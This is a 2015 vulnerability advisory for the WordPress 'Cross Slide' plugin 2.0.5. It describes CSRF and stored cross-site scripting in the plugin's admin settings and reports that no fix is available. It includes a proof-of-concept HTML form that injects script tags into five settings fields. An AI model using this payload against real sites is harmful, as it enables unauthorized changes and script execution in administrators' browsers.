WordPress Cross Slide 2.0.5 Cross Site Request Forgery / Cross Site Scripting

`Title: WordPress 'Cross Slide' plugin - XSS/CSRF  
Version: 2.0.5  
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej  
Date: 2015/01/26  
Download: https://wordpress.org/plugins/crossslide-jquery-plugin-for-wordpress/  
Contacted WordPress: 2015/01/26  
==========================================================  
  
## Plugin description:   
==========================================================  
The CrossSlide jQuery plugin for WordPress is designed to quickly add the JS and CSS requirements to operate the jQuery slideshow.   
  
## CSRF:  
==========================================================  
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page.   
  
  
## Stored XSS:  
==========================================================  
Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields.   
  
PoC:  
Log in as admin and submit this form:   
<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=thisismyurl_csj.php">   
<input type="text" name="csj_width" value="800"/><script>alert(1)</script>"><br />  
<input type="text" name="csj_height" value="800"/><script>alert(2)</script>"><br />  
<input type="text" name="csj_sleep" value="800"/><script>alert(3)</script>"><br />  
<input type="text" name="csj_fade" value="800"/><script>alert(4)</script>"><br />   
<input type="text" name="upload_image" value="800"/><script>alert(5)</script>"><br />  
<input type="submit">  
</form>  
  
  
## Solution  
==========================================================  
No fix available.   
`